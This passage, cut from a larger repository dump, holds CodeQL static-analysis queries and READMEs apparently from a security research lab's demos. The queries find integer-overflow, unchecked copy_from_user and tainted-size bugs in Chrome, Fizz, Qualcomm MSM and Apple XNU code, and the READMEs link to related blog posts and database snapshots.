29 | exists(FunctionCall indexer, GeneralAssignment expr | expr.getLValue() = indexer and
30 | indexer.getTarget().hasName("operator[]") and
31 | expr.getRValue() = result and
32 | getQualifier(indexer) = f.getAnAccess()
33 | )
34 | }
35 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/Chrome/qlpack.yml:
--------------------------------------------------------------------------------
1 | name: chrome-ql
2 | version: 0.0.0
3 | libraryPathDependencies: codeql-cpp
4 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/Chrome/queries/callback_unretained.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name callback_unretained
3 | * @description For each callback, get the types that are unretained in the callback.
4 | * @kind problem
5 | * @problem.severity warning
6 | */
7 |
8 | import cpp
9 | import callbacks
10 | import object_lifetime.obj_lifetime
11 |
12 | //Can change to different types of CallbackSinks for more specific investigation
13 | from CallbackSinks sink, Type unretainedType
14 | where not exists(FunctionCall fc | fc.getTarget().hasName("set_connection_error_handler") and
15 | fc.getAnArgument() = sink.asExpr()
16 | )
17 | and not sink.asExpr().getFile().getBaseName().matches("%test-utils%") and
18 | unretainedType = sink.getAnUnretainedType() and
19 | not unretainedType instanceof Singleton and
20 | not unretainedType instanceof OwnedByBrowserMainLoop
21 |
22 | select sink, unretainedType
23 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/Chrome/queries/callback_unretained_field.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name callback_unretained_field
3 | * @description For each callback field, get the types that are unretained in the callback. (specialized version of callback_unretained)
4 | * @kind problem
5 | * @problem.severity warning
6 | */
7 |
8 | import cpp
9 | import callbacks
10 | import object_lifetime.obj_lifetime
11 |
12 | from CallbackFieldSink sink, Field f, Type unretainedType
13 | //Heuristics from observation
14 | where not exists(FunctionCall fc | fc.getTarget().hasName("set_connection_error_handler") and
15 | fc.getAnArgument() = sink.asExpr()
16 | )
17 | and not sink.asExpr().getFile().getBaseName().matches("%test-utils%")
18 | and sink.asExpr() = generalAssignValue(f) and
19 | unretainedType = sink.getAnUnretainedType() and
20 | not unretainedType instanceof Singleton and
21 | not unretainedType instanceof OwnedByBrowserMainLoop
22 | select f, sink, unretainedType
23 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/Facebook_Fizz_CVE-2019-3560/NarrowingConversions.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name Narrowing conversions
3 | * @description Find all narrowing conversions from a larger integer type,
4 | * such as uint32_t, to a smaller integer type, such as uint8_t.
5 | * @kind problem
6 | */
7 |
8 | import cpp
9 | import semmle.code.cpp.ir.IR
10 |
11 | /** Holds if `i` is a narrowing conversion. */
12 | predicate isNarrowingConversion(ConvertInstruction i) {
13 | i.getResultSize() < i.getUnary().getResultSize()
14 | }
15 |
16 | from ConvertInstruction conv, Type inputType, Type outputType
17 | where
18 | isNarrowingConversion(conv) and
19 | inputType = conv.getUnary().getResultType() and
20 | outputType = conv.getResultType()
21 | select conv, "Narrowing conversion from " + inputType + " to " + outputType + "."
22 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/Facebook_Fizz_CVE-2019-3560/README.md:
--------------------------------------------------------------------------------
1 | # Facebook Fizz integer overflow vulnerability (CVE-2019-3560)
2 |
3 | Use [this snapshot](https://github.com/github/securitylab/releases/download/facebook-codeql-database/facebookincubator_fizz_cpp-srcVersion_c69ad1baf3f04620393ebadc3eedd130b74f4023-dist_odasa-lgtm-2019-01-13-f9dca2a-universal.zip) for the demo.
4 |
5 | [Fizz](https://github.com/facebookincubator/fizz) contained a remotely triggerable infinite loop. For more details about the bug, see this [blog post](https://securitylab.github.com/research/facebook-fizz-CVE-2019-3560). A proof-of-concept exploit is available [here](https://github.com/github/securitylab/tree/95c0bcc670f3b3d98a4d578f8993f8138092b94f/SecurityExploits/Facebook/Fizz/CVE-2019-3560).
6 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/MinIntNegate/.gitignore:
--------------------------------------------------------------------------------
1 | MinIntNegateDB
2 | test.o
3 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/MinIntNegate/00_MinIntNegate.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 00_MinIntNegate
3 | * @description Negating MIN_INT is an integer overflow
4 | * @kind problem
5 | * @id cpp/min-int-negate
6 | * @problem.severity warning
7 | */
8 |
9 | import cpp
10 | import semmle.code.cpp.controlflow.Guards
11 |
12 | // Find this pattern:
13 | //
14 | // ```
15 | // if (x < 0) {
16 | // x = -x;
17 | // }
18 | // ```
19 | //
20 | // If the value of `x` is `0x80000000` then this will not make the value of `x` positive.
21 | from GuardCondition guard, BasicBlock block, UnaryMinusExpr unaryMinus, Variable v, Expr use
22 | where
23 | guard.(LTExpr).getLeftOperand() = v.getAnAccess() and
24 | guard.(LTExpr).getRightOperand().getValue().toInt() = 0 and
25 | guard.controls(block, true) and
26 | block.contains(unaryMinus) and
27 | unaryMinus.getOperand() = v.getAnAccess()
28 | select unaryMinus, "If the value of $@ is MinInt then this assignment will not make it positive", v,
29 | v.getName()
30 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/MinIntNegate/01_MinIntNegate.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 01_MinIntNegate
3 | * @description Negating MIN_INT is an integer overflow
4 | * @kind problem
5 | * @id cpp/min-int-negate
6 | * @problem.severity warning
7 | */
8 |
9 | import cpp
10 | import semmle.code.cpp.controlflow.Guards
11 |
12 | // The previous query had an incorrect result at test.cpp, line 20:
13 | //
14 | // if (s->myfield < 0) {
15 | // s->myfield = -t->myfield;
16 | // }
17 | //
18 | // The problem is that the query used `Variable`, which includes fields.
19 | // So here we restrict the query to use `LocalScopeVariable` instead.
20 | from
21 | GuardCondition guard, BasicBlock block, UnaryMinusExpr unaryMinus, LocalScopeVariable v, Expr use
22 | where
23 | guard.(LTExpr).getLeftOperand() = v.getAnAccess() and
24 | guard.(LTExpr).getRightOperand().getValue().toInt() = 0 and
25 | guard.controls(block, true) and
26 | block.contains(unaryMinus) and
27 | unaryMinus.getOperand() = v.getAnAccess()
28 | select unaryMinus, "If the value of $@ is MinInt then this assignment will not make it positive", v,
29 | v.getName()
30 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/MinIntNegate/02_MinIntNegate.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 02_MinIntNegate
3 | * @description Negating MIN_INT is an integer overflow
4 | * @kind problem
5 | * @id cpp/min-int-negate
6 | * @problem.severity warning
7 | */
8 |
9 | import cpp
10 | import semmle.code.cpp.controlflow.Guards
11 | import semmle.code.cpp.valuenumbering.GlobalValueNumbering
12 |
13 | // The previous query, 01_MinIntNegate, eliminated a bad result
14 | // from 00_MinIntNegate, but it also lost a good result.
15 | // The missing result is test.cpp, line 14:
16 | //
17 | // if (s->myfield < 0) {
18 | // s->myfield = -s->myfield;
19 | // }
20 | //
21 | // The problem is that `s->myfield` is not a `LocalScopeVariable`.
22 | // The solution is to use the GlobalValueNumbering library, which
23 | // is a more general way to find expressions that compute the same
24 | // value.
25 | from GuardCondition guard, BasicBlock block, UnaryMinusExpr unaryMinus, Expr use1, Expr use2
26 | where
27 | guard.(LTExpr).getLeftOperand() = use1 and
28 | guard.(LTExpr).getRightOperand().getValue().toInt() = 0 and
29 | guard.controls(block, true) and
30 | block.contains(unaryMinus) and
31 | unaryMinus.getOperand() = use2 and
32 | globalValueNumber(use1) = globalValueNumber(use2)
33 | select unaryMinus, "If the value of $@ is MinInt then this assignment will not make it positive",
34 | use2, use2.toString()
35 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/MinIntNegate/03_MinIntNegate.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 03_MinIntNegate
3 | * @description Negating MIN_INT is an integer overflow
4 | * @kind problem
5 | * @id cpp/min-int-negate
6 | * @problem.severity warning
7 | */
8 |
9 | import cpp
10 | import semmle.code.cpp.controlflow.Guards
11 | import semmle.code.cpp.valuenumbering.GlobalValueNumbering
12 |
13 | // The previous query only worked for `x < 0` and not for the
14 | // equivalent `0 > x`. It's easier to handle both if we refactor
15 | // the logic into a separate predicate.
16 |
17 | /** Holds if `cond` is a comparison of the form `lhs < rhs`. */
18 | predicate lessThan(Expr cond, Expr lhs, Expr rhs) {
19 | cond.(LTExpr).getLeftOperand() = lhs and
20 | cond.(LTExpr).getRightOperand() = rhs
21 | or
22 | cond.(GTExpr).getLeftOperand() = rhs and
23 | cond.(GTExpr).getRightOperand() = lhs
24 | }
25 |
26 | from
27 | GuardCondition guard, BasicBlock block, UnaryMinusExpr unaryMinus, Expr use1, Expr use2, Expr zero
28 | where
29 | lessThan(guard, use1, zero) and
30 | zero.getValue().toInt() = 0 and
31 | guard.controls(block, true) and
32 | block.contains(unaryMinus) and
33 | unaryMinus.getOperand() = use2 and
34 | globalValueNumber(use1) = globalValueNumber(use2)
35 | select unaryMinus, "If the value of $@ is MinInt then this assignment will not make it positive",
36 | use2, use2.toString()
37 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/MinIntNegate/04_MinIntNegate.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 04_MinIntNegate
3 | * @description Negating MIN_INT is an integer overflow
4 | * @kind problem
5 | * @id cpp/min-int-negate
6 | * @problem.severity warning
7 | */
8 |
9 | import cpp
10 | import semmle.code.cpp.controlflow.Guards
11 | import semmle.code.cpp.valuenumbering.GlobalValueNumbering
12 |
13 | // Let's also add support for <= and >=.
14 |
15 | /**
16 | * Holds if `cond` is a comparison of the form `lhs < rhs`.
17 | * `isStrict` is true for < and >, and false for <= and >=.
18 | */
19 | predicate lessThan(Expr cond, Expr lhs, Expr rhs, boolean isStrict) {
20 | cond.(LTExpr).getLeftOperand() = lhs and
21 | cond.(LTExpr).getRightOperand() = rhs and
22 | isStrict = true
23 | or
24 | cond.(GTExpr).getLeftOperand() = rhs and
25 | cond.(GTExpr).getRightOperand() = lhs and
26 | isStrict = true
27 | or
28 | cond.(LEExpr).getLeftOperand() = lhs and
29 | cond.(LEExpr).getRightOperand() = rhs and
30 | isStrict = false
31 | or
32 | cond.(GEExpr).getLeftOperand() = rhs and
33 | cond.(GEExpr).getRightOperand() = lhs and
34 | isStrict = false
35 | }
36 |
37 | from
38 | GuardCondition guard, BasicBlock block, UnaryMinusExpr unaryMinus, Expr use1, Expr use2, Expr zero
39 | where
40 | lessThan(guard, use1, zero, _) and
41 | zero.getValue().toInt() = 0 and
42 | guard.controls(block, true) and
43 | block.contains(unaryMinus) and
44 | unaryMinus.getOperand() = use2 and
45 | globalValueNumber(use1) = globalValueNumber(use2)
46 | select unaryMinus, "If the value of $@ is MinInt then this assignment will not make it positive",
47 | use2, use2.toString()
48 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/MinIntNegate/README.md:
--------------------------------------------------------------------------------
1 | # Unary minus integer overflow gotcha
2 |
3 | This demo is about building a query to find the bug from
4 | [this tweet by Nico Waisman](https://twitter.com/nicowaisman/status/1147178477692608512).
5 |
6 | This is the pattern that we're interested in:
7 |
8 | ```
9 | int32_t Size = user_supplied32();
10 | if(Size < 0) {
11 | Size = -Size;
12 | }
13 | ```
14 |
15 | The developer who wrote this probably thinks that `Size` is now a positive number.
16 | But they have forgotten that `MIN_INT` will trigger an integer overflow and remain
17 | negative.
18 | So if the subsequent code relies on `Size` being positive, then something could
19 | go badly wrong.
20 |
21 | ## Generating a snapshot.
22 |
23 | This directory contains a unit test file, [`test.cpp`](test.cpp),
24 | which you can use to create a small database for testing, like this:
25 |
26 | ```
27 | codeql database create MinIntNegateDB --language=cpp --command="g++ -c test.cpp"
28 | ```
29 |
30 | This creates a database in a sub-directory named `MinIntNegateDB`.
31 | You can add this database in the
32 | [CodeQL for VSCode extension](https://github.com/github/vscode-codeql)
33 | by clicking the `+` button.
34 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/OpenSSL-hostname-validation/OpenSSLVerify.qll:
--------------------------------------------------------------------------------
1 | import cpp
2 |
3 | /**
4 | * Common utilities for OpenSSL certificate verification.
5 | */
6 |
7 | class SslSetVerifyFunctionCall extends FunctionCall {
8 | SslSetVerifyFunctionCall() { this.getTarget().hasName("SSL_set_verify") }
9 | }
10 |
11 | class SslCtxSetVerifyFunctionCall extends FunctionCall {
12 | SslCtxSetVerifyFunctionCall() { this.getTarget().hasName("SSL_CTX_set_verify") }
13 | }
14 |
15 | class SslLikeSetVerifyFunctionCall extends FunctionCall {
16 | SslLikeSetVerifyFunctionCall() {
17 | this instanceof SslCtxSetVerifyFunctionCall or
18 | this instanceof SslSetVerifyFunctionCall
19 | }
20 | }
21 |
22 | class SslCtxSetCertVerifyCallbackFunctionCall extends FunctionCall {
23 | SslCtxSetCertVerifyCallbackFunctionCall() {
24 | this.getTarget().hasName("SSL_CTX_set_cert_verify_callback")
25 | }
26 | }
27 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/Qualcomm-MSM-copy_from_user/00_copy_from_user.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name Calls to copy_from_user
3 | * @description Find all calls to copy_from_user.
4 | */
5 |
6 | import cpp
7 |
8 | // This first query is essentially equivalent to `grep -r copy_from_user`.
9 | // It has almost 1300 results.
10 | from FunctionCall call
11 | where call.getTarget().getName() = "copy_from_user"
12 | select call
13 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/Qualcomm-MSM-copy_from_user/01_copy_from_user_annotated.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name Annotate with types and bounds
3 | * @description Find all calls to copy_from_user and annotates them with their
4 | * type and inferred size bounds.
5 | */
6 |
7 | import cpp
8 | import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis
9 |
10 | // Let's add some extra columns, so that we can see a bit more information
11 | // about the calls to copy_from_user.
12 | //
13 | // This shows that there are two fairly common patterns:
14 | // 1. copy_from_user into a statically sized buffer, and the
15 | // upper bound of `sizeArg` shows that it is safe.
16 | // 2. copy_from_user into a buffer that was allocated with kzalloc,
17 | // and the size argument of the kzalloc is the same as the
18 | // size argument of copy_from_user. These calls are safe.
19 | from FunctionCall call, Expr destArg, Expr sizeArg
20 | where
21 | call.getTarget().getName() = "copy_from_user" and
22 | destArg = call.getArgument(0) and
23 | sizeArg = call.getArgument(2)
24 | select call, destArg.getType(), lowerBound(sizeArg), upperBound(sizeArg),
25 | call.getFile().getRelativePath()
26 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/Qualcomm-MSM-copy_from_user/02_filter_with_upperbound.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name Filter with upper bound
3 | * @description This query excludes results that are safe because the upper
4 | * bound of the size argument is less than or equal to the size of
5 | * the destination variable.
6 | */
7 |
8 | import cpp
9 | import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis
10 |
11 | // Let's exclude filter out results that look like this:
12 | //
13 | // ```
14 | // struct MyStruct s;
15 | // copy_from_user(&s, usrptr, sizeof(s));
16 | // ```
17 | from FunctionCall call, Expr destArg, Expr sizeArg
18 | where
19 | call.getTarget().getName() = "copy_from_user" and
20 | destArg = call.getArgument(0) and
21 | sizeArg = call.getArgument(2) and
22 | not destArg.getType().(PointerType).getBaseType().getSize() >= upperBound(sizeArg)
23 | select call, destArg.getType(), lowerBound(sizeArg), upperBound(sizeArg),
24 | call.getFile().getRelativePath()
25 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/Qualcomm-MSM-copy_from_user/03_filter_with_upperbound.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name Filter with upper bound, also for arrays
3 | * @description This query excludes results that are safe because the upper
4 | * bound of the size argument is less than or equal to the size of
5 | * the destination variable or array.
6 | */
7 |
8 | import cpp
9 | import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis
10 |
11 | // It turns out that the filter in the previous query does
12 | // not work for array types, so let's add a second filter which
13 | // excludes examples like this:
14 | //
15 | // ```
16 | // struct MyStruct s[2];
17 | // copy_from_user(s, usrptr, sizeof(s));
18 | // ```
19 | from FunctionCall call, Expr destArg, Expr sizeArg
20 | where
21 | call.getTarget().getName() = "copy_from_user" and
22 | destArg = call.getArgument(0) and
23 | sizeArg = call.getArgument(2) and
24 | not destArg.getType().(PointerType).getBaseType().getSize() >= upperBound(sizeArg) and
25 | not destArg.getType().(ArrayType).getSize() >= upperBound(sizeArg)
26 | select call, destArg.getType(), lowerBound(sizeArg), upperBound(sizeArg),
27 | call.getFile().getRelativePath()
28 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/Qualcomm-MSM-copy_from_user/04_safe_malloc.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name kzalloc only
3 | * @description If the copy_from_user is preceded by a kzalloc of the correct
4 | * size, then it is safe. To demonstrate, find only those results.
5 | */
6 |
7 | import cpp
8 | import semmle.code.cpp.valuenumbering.GlobalValueNumbering
9 | import semmle.code.cpp.dataflow.DataFlow
10 |
11 | // Let's see if we can detect this pattern:
12 | //
13 | // ```
14 | // buf = kzalloc(size, GFP_KERNEL);
15 | // ...
16 | // copy_from_user(buf, usrptr, size);
17 | // ```
18 | //
19 | // In the next query, we'll use `safe_malloc` to filter those
20 | // calls out, because they are safe.
21 | predicate safe_malloc(FunctionCall allocCall, FunctionCall copy_from_user) {
22 | exists(DataFlow::Node source, DataFlow::Node sink |
23 | allocCall.getTarget().getName() = "kzalloc" and
24 | copy_from_user.getTarget().getName() = "copy_from_user" and
25 | source.asExpr() = allocCall and
26 | sink.asExpr() = copy_from_user.getArgument(0) and
27 | DataFlow::localFlow(source, sink) and
28 | globalValueNumber(allocCall.getArgument(0)) = globalValueNumber(copy_from_user.getArgument(2))
29 | )
30 | }
31 |
32 | from FunctionCall allocCall, FunctionCall copy_from_user
33 | where safe_malloc(allocCall, copy_from_user)
34 | select allocCall, copy_from_user
35 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/Qualcomm-MSM-copy_from_user/README.md:
--------------------------------------------------------------------------------
1 | [Blog post](https://securitylab.github.com/research/stack-buffer-overflow-qualcomm-msm/)
2 |
3 | [Snapshot for this demo](https://github.com/github/securitylab/releases/download/qualcomm-msm-codeql-database/msm-4.4-revision-2017-May-07--08-33-56.zip)
4 |
5 | The blog post was written before we had the C++ dataflow library, so these demo queries are a bit different than the blog post.
6 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/README.md:
--------------------------------------------------------------------------------
1 |
2 | ## Useful CodeQL Queries
3 |
4 | - [Chakra Code](ChakraCore-bad-overflow-check/)
5 | - [XNU NFS Boot vulnerability](XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/)
6 | - [Facebook Fizz Denial of Service](Facebook_Fizz_CVE-2019-3560/)
7 | - [XNU ICMP Denial of Service](XNU_icmp_error_CVE-2018-4407/)
8 | - [Qualcomm MSM copy_from_user vulnerability](Qualcomm-MSM-copy_from_user/)
9 | - [XNU packet mangler](XNU_packet-mangler_CVE-2018-4249/)
10 | - [RSyslog](rsyslog_CVE-2018-1000140/)
11 | - [LibJPEG Turbo Out of Bound](libjpeg-turbo-oob)
12 | - [XNU DTrace](XNU_DTrace_CVE-2017-13782)
13 | - [libssh2](libssh2_eating_error_codes)
14 |
15 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/XNU_DTrace_CVE-2017-13782/README.md:
--------------------------------------------------------------------------------
1 | [Blog post](https://securitylab.github.com/research/apple-xnu-dtrace-CVE-2017-13782/)
2 |
3 | Bug was fixed in [macOS High Sierra 10.13.1](https://support.apple.com/en-us/HT208221).
4 |
5 | [This snapshot](https://github.com/github/securitylab/releases/download/xnu-codeql-database/XNU-revision-2017-June-13--15-52-38.zip) (macOS 10.13) has the bug.
6 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/BCopyNegativeSize.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name bcopy with negative size
3 | * @description Calling bcopy with a negative size argument will crash the
4 | * kernel due to a negative integer overflow.
5 | * @kind path-problem
6 | * @problem.severity warning
7 | * @id apple-xnu/cpp/bcopy-negative-size
8 | */
9 |
10 | import cpp
11 | import semmle.code.cpp.dataflow.TaintTracking
12 | import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis
13 | import DataFlow::PathGraph
14 |
15 | class MyCfg extends TaintTracking::Configuration {
16 | MyCfg() {
17 | this = "MyCfg"
18 | }
19 |
20 | override predicate isSource(DataFlow::Node source) {
21 | source.asExpr().(FunctionCall).getTarget().getName() = "mbuf_data"
22 | }
23 |
24 | override predicate isSink(DataFlow::Node sink) {
25 | exists (FunctionCall call
26 | | sink.asExpr() = call.getArgument(2) and
27 | call.getTarget().getName() = "__builtin___memmove_chk" and
28 | lowerBound(sink.asExpr()) < 0)
29 | }
30 | }
31 |
32 | from DataFlow::PathNode sink, DataFlow::PathNode source, MyCfg cfg
33 | where cfg.hasFlowPath(source, sink)
34 | select sink, source, sink, "The size argument of bcopy might be negative."
35 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/README.md:
--------------------------------------------------------------------------------
1 | [Blog post](https://securitylab.github.com/research/apple-xnu-nfs-boot/)
2 |
3 | Bug was fixed in [macOS High Sierra 10.13.4](https://support.apple.com/en-gb/HT208692).
4 |
5 | [This snapshot](https://github.com/github/securitylab/releases/download/xnu-macos10.13.3-codeql-database/xnu-4570.41.2_macOS-10.13.3_Semmle-1.16.1.zip) has the bug.
6 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/00_mbuf_copydata_tainted_size.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 00 mbuf copydata with tainted size
3 | * @description Calling m_copydata with an untrusted size argument
4 | * could cause a buffer overflow.
5 | * @kind path-problem
6 | * @problem.severity warning
7 | * @id apple-xnu/cpp/mbuf-copydata-with-tainted-size
8 | */
9 |
10 | /*
11 | * This query is explained in detail in this blog post:
12 | *
13 | * https://securitylab.github.com/research/apple-xnu-icmp-error-CVE-2018-4407/
14 | *
15 | * It is based on the assumption that the function `m_mtod`, which returns
16 | * a pointer to the data stored in an `mbuf`, often returns a buffer
17 | * containing untrusted data.
18 | *
19 | * The query has multiple results. The interesting result is the one in
20 | * `ip_icmp.c`.
21 | */
22 |
23 | import cpp
24 | import semmle.code.cpp.dataflow.TaintTracking
25 | import DataFlow::PathGraph
26 |
27 | class Config extends TaintTracking::Configuration {
28 | Config() { this = "mbuf copydata with tainted size" }
29 |
30 | override predicate isSource(DataFlow::Node source) {
31 | source.asExpr().(FunctionCall).getTarget().getName() = "m_mtod"
32 | }
33 |
34 | override predicate isSink(DataFlow::Node sink) {
35 | exists (FunctionCall call
36 | | call.getArgument(2) = sink.asExpr() and
37 | call.getTarget().getName().matches("%copydata"))
38 | }
39 | }
40 |
41 | from Config cfg, DataFlow::PathNode source, DataFlow::PathNode sink
42 | where cfg.hasFlowPath(source, sink)
43 | select sink, source, sink, "m_copydata with tainted size."
44 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/01_paths_to_icmp_error.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 01 Paths from ip_input to icmp_error
3 | * @description Find data-flow paths that lead from ip_input to the first parameter of icmp_error.
4 | * @kind path-problem
5 | * @problem.severity warning
6 | */
7 |
8 | import cpp
9 | import semmle.code.cpp.dataflow.DataFlow
10 | import DataFlow::PathGraph
11 |
12 | /*
13 | * The previous query, 00_mbuf_copydata_tainted_size.ql, discovered some
14 | * dodgy looking code in `icmp_error`. But is it exploitable? To find out
15 | * we need to figure if the zero'th parameter of `icmp_error`, an `mbuf`
16 | * named `n`, is attacker-controllable.
17 | *
18 | * This initial query looks for expression that flows to parameter `n`.
19 | */
20 |
21 | class Config extends DataFlow::Configuration {
22 | Config() { this = "Paths from ip_input to icmp_error" }
23 |
24 | override predicate isSource(DataFlow::Node source) {
25 | // Any expression is a valid source.
26 | exists (source.asExpr())
27 | }
28 |
29 | override predicate isSink(DataFlow::Node sink) {
30 | // The sink is the zero'th parameter of `icmp_error`: `struct mbuf *n`.
31 | exists (Parameter p
32 | | p = sink.asParameter() and
33 | p.getFunction().getName() = "icmp_error" and
34 | p.getIndex() = 0)
35 | }
36 | }
37 |
38 | from Config cfg, DataFlow::PathNode source, DataFlow::PathNode sink
39 | where cfg.hasFlowPath(source, sink)
40 | select source, source, sink, "Expression flows to icmp_error."
41 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/02_paths_to_icmp_error.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 02 Paths from ip_input to icmp_error
3 | * @description Find data-flow paths that lead from ip_input to the first parameter of icmp_error.
4 | * @kind path-problem
5 | * @problem.severity warning
6 | */
7 |
8 | import cpp
9 | import semmle.code.cpp.dataflow.DataFlow
10 | import DataFlow::PathGraph
11 |
12 | /*
13 | * The previous iteration of this query found every expression that flows
14 | * to parameter `n` of `icmp_error`. The most interesting looking results
15 | * were the ones that started in the function `ip_input` because that is
16 | * where incoming IP packets are handled. So we restrict `isSource` to only
17 | * expressions from `ip_input`.
18 | */
19 |
20 | class Config extends DataFlow::Configuration {
21 | Config() { this = "Paths from ip_input to icmp_error" }
22 |
23 | override predicate isSource(DataFlow::Node source) {
24 | exists (source.asExpr()) and
25 | source.getFunction().getName() = "ip_input"
26 | }
27 |
28 | override predicate isSink(DataFlow::Node sink) {
29 | // The sink is the zero'th parameter of `icmp_error`: `struct mbuf *n`.
30 | exists (Parameter p
31 | | p = sink.asParameter() and
32 | p.getFunction().getName() = "icmp_error" and
33 | p.getIndex() = 0)
34 | }
35 | }
36 |
37 | from Config cfg, DataFlow::PathNode source, DataFlow::PathNode sink
38 | where cfg.hasFlowPath(source, sink)
39 | select source, source, sink, "Expression flows to icmp_error."
40 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/README.md:
--------------------------------------------------------------------------------
1 | # Apple XNU icmp_error CVE-2018-4407
2 |
3 | Use [this snapshot](https://github.com/github/securitylab/releases/download/xnu-macos10.13.6-codeql-database/xnu-4570.71.2_macOS-10.13.6_Semmle-1.18.0.zip) for the demo.
4 |
5 | There are two parts to this demo. The first part is `00_mbuf_copydata_tainted_size.ql`, which is the dataflow query that found the bug. It is explained in detail in [this blog post](https://securitylab.github.com/research/apple-xnu-icmp-error-CVE-2018-4407/). The problem with this query is that it does not find the true source of the untrusted data. This is because it assumes that any call to the function named `m_mtod` can return untrusted data. But not every `mbuf` contains untrusted data. So the second part of the demo, corresponding to [this blog post](https://securitylab.github.com/research/apple-xnu-exploit-icmp-poc/), is to use dataflow analysis to find a path that gets an untrusted `mbuf` into `icmp_error`. The second part of the demo is developed in steps, starting with `01_paths_to_icmp_error.ql`.
6 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/XNU_packet-mangler_CVE-2018-4249/ArrayIndexMightOverflow.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name Array index might overflow
3 | * @description An array indexing expression of the form
4 | * x[i+j] could cause an out-of-bounds write.
5 | * @kind problem
6 | * @problem.severity warning
7 | * @id apple-xnu/cpp/array-index-might-overflow
8 | */
9 |
10 | import cpp
11 | import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis
12 |
13 | // Find an assignment like this: x[i+j] = v
14 | from ArrayExpr ae, BinaryArithmeticOperation idx, Assignment assign
15 | where ae = assign.getLValue()
16 | and idx = ae.getArrayOffset()
17 | and convertedExprMightOverflow(idx)
18 | select idx, "Array index might overflow"
19 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/XNU_packet-mangler_CVE-2018-4249/InfiniteLoop.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name Infinite loop
3 | * @description Updating a loop index with a compound assignment
4 | * could cause non-termination.
5 | * @kind problem
6 | * @problem.severity warning
7 | * @id apple-xnu/cpp/infinite-loop
8 | */
9 |
10 | import cpp
11 | import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis
12 |
13 | // Find loops like this:
14 | // while (x) { ...; x -= n; }
15 | from Loop loop, Variable v, AssignArithmeticOperation assign
16 | where (loop.getCondition() = v.getAnAccess() or
17 | loop.getCondition().(ComparisonOperation).getAnOperand() = v.getAnAccess())
18 | and assign.getLValue() = v.getAnAccess()
19 | // Compound assignment is in the body of the loop:
20 | and assign = loop.getStmt().getAChild*()
21 | and lowerBound(assign.getRValue()) <= 0
22 | and upperBound(assign.getRValue()) >= 0
23 | select loop, "Loop might not terminate due to this $@.", assign, "assignment"
24 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/XNU_packet-mangler_CVE-2018-4249/README.md:
--------------------------------------------------------------------------------
1 | https://securitylab.github.com/research/CVE-2018-4249-apple-xnu-packet-mangler/
2 |
3 | There were multiple bugs in `packet_mangler.c`. One of the infinite loop bugs was fixed in macOS High Sierra 10.13.2. The other bugs were fixed in macOS High Sierra 10.13.5.
4 |
5 | For a demo, the best query to show is `tcphdr_mbuf_copydata.ql`, because it shows uses taint tracking to show the stack buffer overflow.
6 |
7 | `ArrayIndexMightOverflow.ql` is a simplified version of the query that originally led us to look at this code. It looks for array indices that might be negative.
8 |
9 | `InfiniteLoop.ql` is a query inspired by one of the bugs in this code: the loop might not terminate because the loop counter is updated with a compound assignment (`+=`). We wrote an exploit which causes the right hand side of the assignment to be zero, which means that the loop runs forever.
10 |
11 | All three queries find results in [this snapshot](https://github.com/github/securitylab/releases/download/xnu-macos10.13-codeql-database/XNU-revision-2017-June-13--15-52-38.zip) (macOS 10.13).
12 |
